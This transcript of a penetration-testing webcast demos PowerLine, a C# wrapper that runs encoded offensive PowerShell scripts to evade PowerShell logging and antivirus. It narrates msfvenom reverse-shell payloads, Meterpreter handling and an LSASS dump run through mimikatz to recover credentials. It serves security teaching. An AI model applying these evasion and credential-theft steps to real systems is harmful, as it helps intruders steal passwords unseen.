Wild West Hackin' Fest. If you haven't heard about it, you should go check it out. It's going to be super awesome. We have an amazing lineup of speakers. There's so many amazing ones, I can't even begin to name them. But we're going to be there, and you should be there too. It's the first year, so we're learning a lot of stuff about conferences, but the Black Hills are really an awesome place to come visit. So not only is it going to be...
We're going to have a pretty epic CTF too.
Oh, yes, and Bo and Derek are doing the CTF, and they've told me about it, and it sounds amazing. And
it's going to be fun, for sure.
We also have some trainings that are happening on Wednesday and Thursday, and then the conference is Friday and Saturday. We also have some hardware hacking labs that the boys in the back room are also hard at work on. So, and I have put up a description of those labs on the website, so you can go and check those out. We have some sponsors that are bringing some labs. Our newest platinum sponsor, Grim, is bringing a car hacking thing, which is super awesome. And we have Guardians bringing a lab. So how much are tickets? Tickets are $250. So go grab them soon. Definitely we're speeding up on how we're selling them. So that's exciting. And mostly it's going to be super fun because we're all going to be together.
That'll be fun for everyone.
Yeah. Well, and you know, we're all remote, so we don't get to see each other very often in person. So it'll be pretty cool. And it'll be cool to meet a lot of you guys. There's so many people coming from all over the United States. So it's very exciting to get to meet some of you guys in person.
Mm-hmm.
Brian is actually helping with hardware hacking labs, right, Brian?
Yeah, it should be a really good time. So if we're interested in doing hardware hacking but don't really know where to start, this will be really good. So I have quite a few different labs set up of a lot of the different aspects, lots of hands-on stuff. Should be tons of fun. David and Rick have also been working pretty hard on those, and should be cool.
Question from Eric: does the hacking session have a la carte pricing? A la carte pricing. Wow, butchered that. Or is it included? No. All the hacking labs, all the activities that we're going to do, that's all included in the price of your conference ticket. So it should be pretty cool. So Brian, you want to take it away?
Yeah, definitely. Let's go for it. So again, I'm Brian Fehrman, and we are Black Hills Information Security. And today we're going to talk about the PowerLine tool that I've been working on. And so some of you may have seen the talk that I did a couple weeks ago that we broadcasted. I did the Sands at Night talk, and that was really the first time that I did a presentation over this tool. And so if you're rejoining again, it's actually awesome because I have some new things for you. So some of the things I'd mentioned at the end of the talk that we wanted to work on, we've implemented some of those features now. So should be some fun new exciting stuff for everyone, even if you've watched the previous talk. So for those of you that didn't, though, basically, what is PowerLine? What is this tool? And what it is it's just a new way that we can take these existing PowerShell scripts that are out there. So, you know, as pen testers, when we're doing a lot of our attacks, a lot of our assessments, so that a lot of times we'll use these different PowerShell scripts that are out there. So, I mean, things like PowerView, things like PowerUp, and all those different things we've all heard of and have all come to love. And so this tool gives you a way to do that without using PowerShell directly. And that's a program that's written in C#, and we'll talk about some of the reasoning behind that as we go through the presentation. But it's nice because since you're not calling PowerShell directly, we can get around some of the different monitoring mechanisms and different detection mechanisms that companies are starting to put into place. And one of the novelties of this is you might be thinking, well, you know, I've seen a couple of these tools before, like PSAttack or PowerOps, which are all good tools. But one of the things that's nice about this one is that you'll get to see is that you can actually use it remotely. So if you have something like a Meterpreter session, you have something like an Empire session, Netcat, basically anything that allows you to run things on a Windows command line remotely, you can use this. You should be able to use this tool through that. I'm not going to say anything because I haven't tested everything, and I know inevitably someone's going to be like, "Wait, it's broken." But most things it should work on, which can be pretty handy to not have to drop the scripts onto the boxes and get around some of those other protections might be in place. The other cool thing about it being written in C# is that we can use some of the different whitelisting bypass techniques that we've seen out there, such as the install util method, for instance, is one thing that you can use with this. So it can be pretty handy. And so here's the standard about me slide. And I don't know, security something or another, give me whatever title, I don't know, analyst research or something, you can throw it in there. It's all fun, so I don't care. Degrees and things, nobody really cares about those. It's my wife over there, and so I told the story last time, I'll tell it again. The picture there, it's me, my wife, and our dog out in the woods, and you can see I have my gun. And so I was just sitting around, I was working on something, and my wife is like, "Hey, do you want to go Christmas tree hunting?" And I was like, "Well, I don't know, maybe. Can I shoot the tree since we're going hunting?" And she's like, didn't even really look very surprised, just kind of thought about it for a second and then said, "Yeah, get your gun, let's go." All right. So there we are, Christmas tree hunting. Also, cat video enthusiasts, so if you guys have any good cat videos, please send them my way. So let's talk about PowerShell. PowerShell is something that came out around Windows 7 by default in Windows 7. Yeah, you can find it there, and it's really nice. It's a nice scripting language that can be very useful for different system administrators and automating lots of different tasks on the network that you would normally have to do manually or using third-party tools. And as such, since most things that are good for system administrators can also have utility for both testers and attackers. And so a lot of people have really been turning towards PowerShell in the last couple of years to implement different tools that we can use during testing. And I would say, in terms of its usability, what it reminds me of is it reminds me a lot of Python, I guess. Other people say it's closer to Perl. For me, it's kind of, if you just want to jump into starting to use some kind of a programming language, it wouldn't really be too bad of one to start with. It's just it's nice, easy to use, but you get a lot of power out of it by being able to interact with a lot of the back-end Windows features and a lot of other network features as well too. So the thing, though, is now that so many people have been hopping on this PowerShell bandwagon, that it's really just becoming the standard, go-to thing for testers and attackers. That we hop on a network and we just start running these scripts. People are starting to take note of this because there's so many scripts out there to just do so many different things you might want to during testing or during an attack. And as a result of this, we're seeing more and more vendors who are starting to try to block these scripts from being run. They're starting to do static analysis on scripts. So we're even seeing vendors writing signatures based on things like the comment headers. So the comment headers of functions. Some people will do that. Some people look for, like Matt Graver at a script and block based upon that and just other things because these scripts are getting so common. And the other thing that we're seeing is even if companies aren't blocking them, they're not doing on the prevention side, we are seeing a lot of people starting to move towards the detection side at least, so that if you run something using PowerShell, that'll get logged, it'll generate up an alert, and then they'll usually go and investigate it because typically most standard users don't really need to use PowerShell. I mean, maybe they're the occasional one that might pop it open, but usually you're not going to see too many normal users just opening that up and doing their day-to-day tasks with it, like generating up a spreadsheet or something, I don't know. So how do we get around some of these protections that are in place? So if PowerShell is being blocked, what are some of the things that we can do? Well, PowerShell is really just the front end for the .NET framework, and C# is also really just a front end for the .NET framework. .NET framework just basically kind of the backbone of Windows. A lot of the different features, functionality of Windows. That's the .NET framework. And so we have these two different approaches, I guess, to interfacing with this framework. And what we have to kind of bridge that gap is what's called the System Management Automation DLL. And what that is it allows for writing a C# program that effectively does calls to PowerShell, but without actually calling PowerShell directly. It's kind of like a conversion mechanism to get from that C# to the backend .NET calls that you would normally get to if you're using PowerShell itself. And so what this allows for is that we don't need to port over all the PowerShell scripts into, say, C#, just yet. Maybe one day we'll start looking at that, but for now, there's no need to reinvent the wheel. We might as well just use all these awesome scripts that are out there, and we can do that. We can actually just grab these scripts, we can basically import them or embed them into a C# program, run those scripts, and it doesn't actually, since it's not actually using PowerShell, it's not going to get alerted on as a PowerShell call, and it's not going to be blocked if they're not allowing the people to access PowerShell.exe. And so, as I kind of mentioned a little bit before, some of the existing tools that are out there, PSAttack and PowerOps, kind of a little bit similar in that they have this concept that you have a C# wrapper, and you take some of the common PowerShell scripts that you would normally use, you embed them in this program, you create an executable, and then you're able to call those scripts from within that program. And so both of these are really, really good tools. They're fantastic tools, and definitely encourage going and checking them out. One of the things, though, is that both of these seem to have to be used on the client side. So it can't be executed through like an Meterpreter session, through an Empire session, other command and control sessions, just due to the way that they're set up. If you try to do it, it's going to crash, and you're not going to get the results you want. And so that's kind of where PowerLine comes in. And basically it just allows you to say that you get a session on a box, and you want to start using these scripts, but you don't want to drop the scripts onto the box. And this gives you a way to do that. So you can just basically just drop the executable on the box. You can start running these scripts, and it's not going to alert on PowerShell usage, at least, and it's going to get around those kinds of prevention measures. The other nice thing is that you can actually, if you don't want to drop an exe on the box, you can actually compile it on your target machine as well too. So you can transfer over your source code files, you can run the compilation, and you're ready, you're off and running. So now you have basically an executable that might be trusted because it came, was generated on the machine rather than remotely. So a lot of flexibility there. And so what are some of the current features that I have in PowerLine? So one of the things I put a lot of work into is to ease the deployability and building of it. So before, if you saw my talk before, we had to use Visual Studio. We had to import the project. We had to we had to grab our script and run it through that PowerStripper program, base64 encode it, copy and paste it into the program, recompile the program, and it was kind of a lot of steps to do. And so I've taken all that burden out. It should be much easier. Basically, you just have to run a couple commands and you'll get going. And we're gonna walk through all that today. The other nice thing is that it'll automatically detect whether you're on a Windows 7 or Windows 10 machine while you're doing the build. And just because what we actually found out just this morning, and thank you again, Bo, for testing this and catching that right before we did the cast. But so what happens is on Windows 10, it doesn't have versions of the .NET framework prior to 4.0 by default, whereas Windows 7 starts out at version 2. And so we're targeting just version 2 to try to get the most compatibility out of the environment, but apparently it's not the case. If you're on Windows 7, we'll go with the version 2 framework. If you're on Windows 10, we'll go with the version 4 framework. And you can actually use this if you don't want to run scripts. I don't have an official feature, quote unquote, built in yet to be able to do this, but I'll demo how you can actually use this as a PowerShell, just a normal PowerShell terminal. Basically, whatever PowerShell commands you want to run, you can run through this. You don't have to run scripts. It just basically ends up taking all the scripts and whatever commands you send in, and it just executes it in kind of a normal PowerShell fashion. So you can really do whatever you want with it. The other nice thing that I've added in, and I mentioned about the kind of the burden of how you put in your scripts before, is now what you can do is you can just specify which scripts you would like to include. So there's just like an XML file. You can specify the scripts you want to pull down from, GitHub, Bitbucket. If you have your own repo that you want to pull from, if you're hosting like a local repo, you could pull from that as well too. And it'll go out, it'll pull down the latest versions of all those scripts, and it will keep them in memory. And then what it does is that each time you build this, it will randomly generate a byte that we'll use to XOR encode the scripts, and then it base64 encodes them, puts them into a new file for you, and then builds the whole thing. It's a completely automated process. So pretty slick, and should help to bypass a lot of static analysis tools that are just running, essentially looking at the strings within files and or looking for the scripts to come down and other things of that nature. So now it's live demo time. Is everyone excited? Yay, live demos. Everyone cross your fingers. Okay, excellent. All right, cool. So yeah, let's just go ahead and let's walk through this process of how you can go out right now if you want to. Actually, you can grab down the files, you can build them, modify them, all the good stuff. So the repo, and this will be on the end slide that we post up, just in case you can't see this. Can everyone? Is this a good size? I don't know. What do you?
It looks good on my laptop, so I think
okay, cool.
I think it looks good.
Awesome. So I'm gonna head over to github.com, full metal cache, and PowerLine. All right. So once you're here, all you have to do is just on this cloner download, you just go ahead and download the zip file. Come on, internet connection. Okay, save. Okay, open folder. I'll go ahead and drop this on the desktop. All right, so now I'm gonna go ahead and extract, and you can just leave it as the default, doesn't matter. Cool. So now once I'm in here, I'm gonna go ahead, shift right click, open command window, or you can open the command window, navigate to it, whatever you would like. For those of you who haven't seen the shift right click, super handy. So once I'm in here, I'm gonna hop into one more directory down, and then one more. So that's just the repo directory. Here it's just the, another top level directory. Let's keep things all in one spot. Probably don't want to run the directory. All right, so once you're in here, you'll see quite a few files going on. The only ones that you really need to pay attention to are these, the user, where is it, somewhere in here, user conf.xml file and the build.bat file. So if you want to, what I'll do right now, just so you can see how easy it is just to get going with it, just run build.bat. Everyone cross their fingers. Sweet, that's what I like to see, green. All right, so what it did right there, was it went out, did I push up the wrong, okay, so if you guys go and grab the build script right now that is purposely messed up for testing earlier, I think everything should still work. Yeah, okay, cool, we'll fix that later. But anyways, just go out, run the build.bat, and from there, you go ahead and run PL Builder. And so, so this is awesome. So Avast comes up, and Avast is actually running it in like a little sandbox thing. It's like, hang on, this file might contain something bad. We're going to scan it for a quick 15 seconds to see if it's malware. So it tries to scan it. And success. I don't know why it fails in the Avast window there, but you can see the window pops back up, and it's like, oh, yeah, we checked it. Everything is cool and good to go. So, so awesome. So now we've got our PowerLine file built, and I'll walk through what these different pieces mean, but just showing you kind of the process here. So to run it, PowerLine.exe, and I'm gonna give it a dash. Let's go ahead and make this window bigger. No? Okay, dash show scripts. And again, it's like, oh, I haven't seen this exe before. I'm going to go ahead, I'm going to scan it, make sure everything's okay. Oh, no problems found. Sorry for the wait. It's awesome that it's apologetic. My bad. Cool. So I've run the output program here, PowerLine.exe. I gave it the dash show scripts. If you were to just type, PowerLine.exe, not quite sure what to do, it'll go ahead and it'll tell you, at least here's kind of the usage. You can do show scripts if you want to see what's imported. And so this list right here, this power view, power up, out mini dump, invoke mimikatz, these are the scripts that it currently has embedded within the program. So it has the full-fledged versions of all these PowerShell scripts. So if you were to go out and you were to search for, PowerShell Power View, PowerShell Power Up, all those things, find the repo, that's what you have here. And you have all the functionality that is available in each of those scripts. So for instance, I'm going to make this bigger. Hang on. I'm going to see if I can get this. It's killing me to have this. Here, I'll tell you what we'll do. What's the upset about? Dragon. Okay. Cool. That should be a little better. All right, so PowerLine.exe, I'm in the same directory. I just moved it so that it wasn't cutting off the entire command there. But I can do something, give it the script name, PowerUp. So basically what I've done here is I've said import the PowerUp module for me to call functions out of it. So it's pretty much just like saying import module if you're on a PowerShell prompt. That's where we're at right now. And so the next thing you do is you give it arguments. And to do that, just put them in double quotes. And so I'm going to give it the function I want to call. In this case, I'm going to do invoke dash all checks. Power up is not currently present in the program. That is awesome. Is that because I did not? Maybe I need to rebuild it.
Hey, Brian.
Killing me here. What's up?
Can you put the GitHub link in the chat box? Do you have that handy? Yeah. Okay,
yeah,
cool.
Sure thing.
Thank you.
Yep, no problem. So it is where is the chat? All right, so, someone's got it there. All right, hang on real quick. So this was from testing earlier, and of course this, live demo, there has to be at least one issue, but this is a quick fix. Basically, I was just testing to make sure that it detected the correct Windows file system, or the correct Windows version by it wouldn't let me move the MS build file. Basically, it just goes and it looks to see which MS build file you have, and if one's not there, then it tries the other. And so it wouldn't actually let me move the MS build file or get rid of it. It thought that that wasn't safe or something. So I just renamed what I was looking for here. So I got that saved. I'll push these up when we're done here. One more file I gotta edit, and that's going to be this one right here. All right, so that should be 6464. Save. All right, everyone cross their fingers. All right, so I'm going to rerun the build.bat file. What that does is that creates the PO builder.exe. Did you get the right framework this time? Yes, I got the right framework this time, version 2.0. Excellent. And next I'm going to run PL builder. Avast is going to do its thing because it's a new exe that just got generated. So it's like, hey, I should probably check this again. Okay, so we didn't get the error over there. That is good. And so, yeah, so it runs again with Avast because, again, Avast is running it in its own sandbox. And then after it's done, then it runs for real. All right, now that it's run.
Hey, Brian, I got a quick question. Somebody brought up a question. They asked about CrowdStrike. And we haven't had a chance to run it against that yet. But the question was command line logging and those types of utilities. So would command line logging be able to detect this, I guess is the question that they popped up with.
Yeah, so if they're doing command line logging and they were put in rules looking for just the PowerLine exe or looking for some of these arguments, then certainly they're going to see these things. And that is one thing that I would like to put in the future, because I think that's a really good point. But basically, semi-randomize the name of the file that gets output. So rather than it being PowerLine.exe, it could be, I don't know, aardvark.exe or something like that. And then maybe randomize up the function calls as well, too. Yep.
And that's kind of the big check. Like a lot of these tools that we've seen, like we're talking about Silence and things like that, they're actually looking for very specific strings for some of the tools that are out there. We do have a webcast coming up with Derek where he's going to be talking about poor man Sysmon that's doing application and command line logging. That's going to be coming up here in a few months. But we'll be discussing that here in a little bit. But no, Brian's absolutely right. Just changing these things up a little bit sometimes catches it, because it's really hard to detect everything that's running at the command line, even though that might actually be a pretty good idea. All right, Brian, throwing it back to you.
Okay, cool. So yep, as I just noticing that too, and as someone pointed out in the chat, I have the casing wrong on here. I thought I'd put in for the to not be case sensitive, but that doesn't seem to be the case. So we're going to try this. I'm going to go back up to shell scripts. All right, come on, work, please. Thank you. All right, I'll fix that. So case sensitive apparently. And while that's running, so that's going to run over here. And the other nice thing too that I put in here is that you get the output as the script is running. So rather than having to wait until the script is done, you can see it go, and so you can see what the progress is. And this is true even if you're in a Meterpreter shell, and we'll see that in a little bit. So some of the other times, yeah, I thought that was Linux. Yeah, it's funny. So if you've tried to run PowerShell scripts through Meterpreter before they put in the cool little plugin thing, you'd have to wait for them to finish. You have to well, it wouldn't really come back at all because it runs a new process. That isn't the case here. You'll get all that output back, and we'll see that in a bit. So that's still running, and while that's running, I want to talk about one other thing too. Let's open this and see if my thing doesn't crash. Okay, so the line endings aren't working there. All right. Open it with Notepad++. I don't know why it started doing this split window thing. So anyways, one of the planned features I do have, and it could also use the same thing for randomizing the name of the program that is outputted. But I have this list of dictionary words here. I just downloaded a small dictionary. It went through, removed any words that were reserved words in C#, removed any words with apostrophes, removed duplicates, and anything less than 4 letters. And so what the next feature that I'm going to add in will be code randomization as well too. So I mentioned before that the scripts are getting XOR encoded and then base64 encoded with a byte. It's just a single byte that gets randomly generated each time you build. But the other thing that I think that we'll see people companies start doing a lot more is just looking for specific functions and structures of functions, and especially the names of those functions. And so the next feature this is going to have that I'm working on right now is to just basically take randomly take words from this this dictionary here, and then go and replace variable names and function names and all that stuff, so that you'll end up with, instead of run, you'll end up with administer or something like that now, something weird. Keep them on their toes. All right, so that's done. And you can see we got the output. You can see the vulnerabilities of my VM. If you want to, hop on my machine and attack them, go ahead. But I am an local administrator too. So, but anyways, that's kind of the gist of just grabbing it, building it, running it. If you want to get going, you don't have to really make any changes to it. But let's walk through what do you do if you want to add in more scripts. So I have 4 scripts there that just for convenience and for example. So if you want to add in more, just go down, and this is in the top directory, this user.conf.xml file. Just go to edit, and in here you can see these are the URLs of the different scripts that we have included. So it's just the links to the raw files on the GitHub site. And for these last 2 here, the mini-dump and the invoke mimikatz, I have examples of how to use those, especially for the mimikatz one. That was, I'm going to be honest, hell trying to get that escaping to work correctly. But it does work now. If you were at my talk, saw the SANS talk, I had an issue. I don't remember what it was with the other PowerShell proc dump file, but this one is working now. And so we'll look at that in a bit. But to show you, if you wanted to add in another repo, all you have to do just make another set of these remote tags, and let's go find our repo. Let's grab something from Mr. Daptac. There he is. Epic beard, as always. All right, what should we do? What do you think, Bo? Host recon, domain passwords for, I'm not on a domain, but we can run it.
Host recon would probably work.
All right, let's do it. So hop over to the script, grab the raw link, copy it, paste it, save, and that is it. All you have to do now is just rerun plbuilder.exe. You don't have to rerun the build.bat file. The build.bat file is strictly for building plbuilder.exe for the first time, but once it's built, all you have to do is just add in your scripts over here, rerun plbuilder. It'll grab it. You can see it's in the list now. So grab it down, XOR encoded, base64 encoded, and it is part of our program. So now if we go do PowerLine.exe, show scripts, and Avast is going to do its thing, a new exe, cool. Now we can see we have host recon available.
Hey, Brian.
What's up?
Couple quick questions. We have three. The first one, is this tool proxy aware?
Is the tool proxy? It would depend on.
It depends on what you're invoking, right? It would depend on what tool you're invoking.
Yeah, exactly. It would depend more on the tool itself. So with grabbing down the scripts, it just does whatever .NET's web request is. I'm not sure if that's proxy aware or not. That's a good question. But in terms of the other scripts themselves, it would depend on those scripts. So.
And another question was, how does PowerLine compare with PSAttack? And once again, I think that it's different. PowerLine is allowing you to wrap and run these scripts effectively in kind of a stealthy sort of way. It's not actually a replacement for them, correct?
So one of the main differences, so PSAttack has that as well, and a lot of these features you're saying, but one of the huge differences that between this and PSAttack is that PSAttack won't work remotely. So if you go out right now and you try to run PSAttack through, say, a Meterpreter session, through whatever your command and control session is, it just crashes. It doesn't have the features built in that allow you to execute it remotely. So cool. That's one of the big differences right now.
And then another question, final one in this group, can you change your user agent string? And I'm assuming that that's a yes.
Yes, yeah, so that would be, you could do that within the code, but yep, you should be able to do that.
Thanks, kick it back over to you.
Okay, cool, yeah, excellent questions. All right, now that we have that imported, Bo, what do you think I should run?
Just run invoke -host recon.
All right. Cool. So now to run it, give you out all kinds of awesome information. You can scroll back up, you can see all the output. Cool. So that's a lot going across the screen. What do we do if we wanted to, I don't know, save that output? So as I mentioned, you basically have all the PowerShell functionality that you normally would if you were sitting on a PowerShell prompt. And so if you wanted to add in something else, say like tObject, so we'll go ahead and we'll pipe that output to the tObject object, and so that we can see the information as it comes across the screen, but can also save it to a file. So let's just save it to, I don't know, host results.txt. Rerun it again, we can still see the output. I'm gonna go ahead and just kill it to save some time. Error connecting to the domain. Okay. And so now we can see we have host results, and you could do type if you're on Windows, and go ahead and see the contents of that file. So cool. Other things you can do if you wanted to. And these are untested features. We're going to try this. So actually, we're just going to skip that. So And so you can pretty much run whatever commands you want to over here. I'm going to add in an extra method that will basically just be like shell or something like that, so that you can just call whatever PowerShell calls that you would like to make, whatever PowerShell methods that you would like to call, to which you would like to make calls, and do that without having to import scripts. But all that is there. The framework's there. Just need to add in just like a couple things, and that'll be working. So. Okay, so what next? Let's do, actually, let's do it like this. All right. So as I mentioned, this can be used remotely, and so let's go ahead and let's check that out. So I'm going to hop over to my Kali machine.
Hey, Brian, while you're typing that up, we had a question from David. He said, will the PowerLine executable download then execute the script when you run it on the target machine, or is it compiled into the exe?
It is compiled into the exe. So when you're putting the remote scripts into that XML file, it just goes and it looks at that file, and then when you run the PL builder, which is PowerLine builder, you run that. It looks at that XML file, it grabs down those scripts, and then it actually generates up a source code file. And puts that along with some other template files, compiles the program, and now those scripts are actually part of your program. They're embedded, they're XOR encoded, and base64 encoded as well. And so one of the features that I'll be adding in the near future, will also be the ability to just import local scripts as well. So if you don't want to have to go out to a repo every single time to grab down the scripts when you build the file, remember once it's built, it doesn't have to reach out to get them. But if you just want to grab them from your local repo, that feature will be in there as well.
Hey, Brian, also, can you export the output?
Export the output, to like a file?
Mm-hmm.
Yep, and so that's kind of what I just run there. I'll go ahead and I can just hop back in. And PowerLine exe, and we'll just do host recon. That. And so you can, at this point, whatever you would normally do in PowerShell to export your file. So if you like to use a -out file, pipe it to -out file, you can do that. Last time I used the T object, but here we can use out file if you prefer. And give it a file.
We just had someone ask, will this bypass silence? And we just had David version is bypassing silence so far. So we just lost audio in the middle of that. So that answers that question for everybody.
Okay, awesome. So I'm betting then that they probably, yeah. So the other thing I've changed is the way that one of the other features of this is that the DLLs that it calls should now be embedded in the program itself, rather than calling them from the system. So it just kind of totes those around with itself, and so that should help with some of the detections. And the other thing too that has changed from when you had mentioned that about the silencing, David, up until now is the encoding of the scripts, whereas before they were just stored in just base64 format, but then the names of the scripts were in plain text, so it's quite possible they're just looking at that too. So awesome, good to hear, and thanks for the feedback on that. I really appreciate it.
Hey Brian, I got a quick question.
Yeah, what's up, man?
Hey, have you actually tried embedding something like a PowerShell Empire launcher within PowerLine yet?
I have not. That would be interesting to see, though. How much time we got? We have 22 minutes. Is there? Oh, if there's one available, because I have to grab it from somewhere where I host it. I bet actually I could probably host it from my other machine, and I could grab it down from there. So we'll try that out. If we have time at the end, we'll try.
That'd be
we'll
super
try that
interesting because you'd have, at that point you'd have like the shell running as your PowerLine process as opposed to PowerShell, which would be pretty awesome.
Yeah, that sounds pretty awesome. Let's try that at the end if we have time, definitely. Because I would like to see
Brian,
that, and
you
then
can
everyone
always-
can watch as we trial by fire.
Brian, you can go over an hour. I mean, some people can't stay for more than an hour, but we do record it all. So like it's fine to go over the hour, and then people can just catch it in the recording too. So
Okay. Cool. That sounds awesome. So I'm going to walk through just kind of the basic use of it through if you were to deliver a payload through another method first, and then we'll go and we'll try that out. So we'll have to work together on kind of a debugging, troubleshooting in it. But I think that'll be awesome. I think we can get it. That's an awesome idea. So over here on my Kali machine, I've already downloaded the repo just to save some time. And I'm going to go ahead. I'm going to generate up a payload. So we'll just do msfvenom-p Windows/x64 Meterpreter lhost equals 2.168.1.106 168.106 lport equals 554, and we're just going to use PSH CMD format just for now. Cool. So we have our payload generated. And so I'm going to go ahead, I'm going to start up MSF console. Open another terminal. Actually, I'm going to kill this.
And for anybody that's complaining about the noise in the background, remember, clacking is hacking.
Wow, I think that's a new T-shirt.
Yeah.
I would definitely buy that.
I think we need that.
Yes. Nice. Oh, okay. Yeah, and this is just a normal keyboard too. I can imagine what it would be like if I had one of those super clacky mechanical ones.
Okay, so I guess Sierra's now got a job to come up with a T-shirt for Wild West Hackin' Fest.
Yeah, definitely. All right. So I just hopped into crap. I wanted to go down a couple more directories here. Okay, cool. Just so that once I'm in Meterpreter, I don't have to deal with moving around the file system there. I'd rather just do it from here. So copying my payload to this directory. Okay, cool. Now I'm going to start MSF console. From this terminal, and I actually didn't have to move my payload, but whatever. Let's go with it. All right, so I'm just going to go ahead. I'm going to start up a Python simple HTTP server. I was waiting for MSF console to pop up, and now that MSF console's up, use multi-handler. Set payload /x64. I used to reverse TCP, right? Or did I accidentally type HTTP? Anyone remember? TCP, cool. First TCP.
What am I? Where am I? Am I on a web? What is this? What did I type? Help! It's the live demos.
Yep. All right, so enable stage encoding. Set my stage encoder. I just like to use the x64 one. And the other thing I like to do is do auto migrate. Auto migrate script. This is nice for those of you who haven't used it before. This auto migrate script feature. Basically, once you get a shell on the other system, rather than having to go and migrate to another process yourself, it will start a new process. I think it just starts notepad.exe and then automatically migrate to that. And I've actually seen that bypass certain detection software before that otherwise catches the session if you wait too long to migrate. But if you migrate within like a 1 or 2 second window, it wouldn't catch it, which was kind of neat. That said, though, I can never remember what the actual path is. So I saved it here ahead of time. There we go. All right, so I've got that set. I think I got everything. All right, got my Python listener going. I've got my handler going. So let's go download the file. Alrighty, and where are you at? Did I actually move it? Desktop. Oh, no, it was there. I just missed it. Cool. And of course, we'll go ahead and run it. Actually, I'm going to download it. Save target as. And let's put it on the desktop. So I'm going to go ahead and run it as an administrator because that's even cooler. All right, give it a second. Okay. So I had the session. It didn't actually migrate though. I wonder if I typed that wrong. Oh well, I'm not gonna worry about troubleshooting that. Anyways, so I've got my sessions at least. That's the important part. The second one should be the one where I'm an administrator. So I'm gonna go ahead and do sessions-i2. All right, sysinfo. Cool. So next, I'm going to go ahead, I'm going to upload upload the whole file, PowerLine master to message file directory, dir. What is it, LDIR? Okay, background. Oh, right, because it's on my desktop. That is correct. All right, so I'm going to do root. Cannot find the path specified. Oh, because I need to escape. Did it not? Oh, it didn't actually upload the subdirectories. Okay, that's all right. We can do this. All right, it's uploading everything. So you could pre-compile the exe if you wanted to, and you wouldn't have to transfer everything, but we're going to go ahead and just see if we can compile it on the machine remotely. I haven't actually done this yet, so I'm hoping that it works. So I'm going to hop down to the shell now. Okay. Next, I'm going to do dir. And I'm going to go ahead and do not MS build. One error. What happened? Practice assemblies could not. Source file. Oh, so there are a couple more files that I need to transfer over. Hang on. Exit. Background. And what else? Properties. That's the other thing I need to upload. And I'm sure there's an easier way to do this. I'm sure some people are like, oh, you just do this. But we'll go with this for now. And we're going to need to upload the PowerLine. You can probably just transfer over the entire zip file. I'm just concerned that I won't be able to actually unzip it once I get it there from the command line. So just bear with me. This is a bit tedious, but again, I mean, you could just pre-compile the executable and just transfer over the executable as well too. It's mostly curious to see if this will also work like this though. Packages. Oh. Okay. And there's one more. What is it? Properties. Did it just put it in the, oh, it didn't actually move the folder. Okay. Anyone know, can you, I don't think you can just unzip from, oh, you can. Okay, sweet. That would have saved so much time. All right, so we're gonna go ahead. We're just gonna do upload. All right, unzip. Yay, all right. So did that create the PowerLine folder? Where are you at? Or did it just extract everything? PowerLine. Okay, oh, there it is. Okay, CD PowerLine master.
While he's firing this up, it's just kind of, somebody was talking about demos and doing off-roading. Yep, just kind of going through off-roading and trying different things from the group, and we'll set that up. We also have some people that are running on a whole bunch of different PowerShell scripts, which is exactly what we love to see, and they have questions and a couple little errors. Whenever you guys are working with this, if you guys have any issues, we have a Git link up above, and if you do run into any issues with it, yeah, go to Git, open up an issue. That's why we do this, right? We're coming out with a brand new tool. We expect there to be some little hang-ups and some different requests, so please, please, please go there and contribute to the community if you have any other ideas on how to add this stuff in. All right, Brian, you ready for me to hand it back over to you?
Yep, sounds good.
All right, here we go.
Yep, cool. Yeah, definitely. Please, any problems you run into, let me know and get those looked at. So it looks like it is building now with the build.bat, so that's cool. Let's go ahead and run pobuilder.exe. And so here we're not going to get the output back right away. It'll all run basically, and then once it's done, then we get it back. That's just through the builder program. Okay, so now I've got it built. I should have grabbed all the scripts down, and so now we should be able to run our PowerLine program. Awesome, so far so good. And I need to grab, I'm going to go ahead and I'm going to go to the userconf.xml file. If you remember, we have inside of here the example commands for the process dump and running mimikatz against it. So I'm just going to copy these, paste it over. Looks like it worked. Excellent. So next, I'm going to go ahead and grab this one. I'm going to, so it's lsas_632. Let's grab that. So what that did is it just used the PowerShell version of procdump to dump the lsas process. Now I'm going to run PowerShell mimikatz against that file. It's not actually scraping it from memory. So it's running it just against that file. And I've had really good success with this in terms of bypassing different detection that are in places in a lot of environments that we're seeing now. So they'll detect the memory scraping and process running. So there you go. So just using those two features there through the Meterpreter session, but using the PowerLine.exe program rather than using the mimikatz directly to actively scrape the memory. We used the procdump to dump the memory and then ran mimikatz against it, and here you go. Oh wow, neat. That's not my normal password, but I thought it would be fun. So so there's that. That's most of what I wanted to show for the I guess just to give you guys kind of an idea of the different features that are available. So now, if you wanted to, we could try running the like an Empire script, something like that. What do you guys think? Should we do it? I need at least one yes. A little bit more enthusiastic.
Yes, please.
Awesome. That was fantastic.
Well, I'm excited.
So exciting.
So this remote exploit is also bypassing Avast. Yes, it is.
Mm-hmm.
We got Woot, go for it. Hey, what the hell? Please, please, please. All the yes. Run all the things. Here we go. All right.
Okay.
Sounds good.
Sounds awesome. And so here's our these are alerts from last night. You can see how close I was cutting it in terms of getting this ready here. But this was alerting before so this was when I was downloading and I wasn't doing just to memory. I was actually downloading to disk, and this was alerting on putting it on disk, but I just changed it so it just stays in memory, and magic, alerts are gone. All right. So let's hop over here. I'm gonna go ahead and do exit. Background. All right. Let's just open up another terminal. New window. So I don't actually have Empire on this machine. Is there a good Meterpreter? Can we use something with MSF Venom? Is there a good script for that? It'll also have a function that we can call. I guess it doesn't actually have to have a function. We can just call the script directly. Let's do that. Just gonna answer my own questions. Venom-P, so let's do Windows. And I think it's just PS1, I think is what we want. Let's try PS1. All right, I'm gonna cat it out. So that is not it. Is it? Here, we can just do this. All else fails, check out the help. All right, so we want I think we want PSH reflection, or maybe it's just PSH actually. There we go. That looks right. All right, so what do we got? We've got that. Bytes down. Okay, yep, that all looks good. So let's go ahead and let's post that up. Simple HTTP server. What do I do? Simple HTTP. Oh, do I still have my other one running? That's fine. Let's do 8080. Oops. Okay, cool. So what did I call it? inv.ps1. Okay. So let's hop over here. Let's open up our comp file. Edit. Oops. Dang you, numlock. All right. Oh, that was wrong. Okay. /inv.ps1. All right, so I'm just pointing it to that Kali server, so we'll just grab it down directly. So let's rebuild. Let's make sure that is in the right directory. Yep, okay. Looks like it grabbed it. Fast is going to do its thing. Cool, looks like it's there. So everyone cross your fingers and let's give it a whirl.
So we're like right about at an hour. If you guys need to leave, it is going to be recorded, so no worries. You can watch the recording. So yeah.
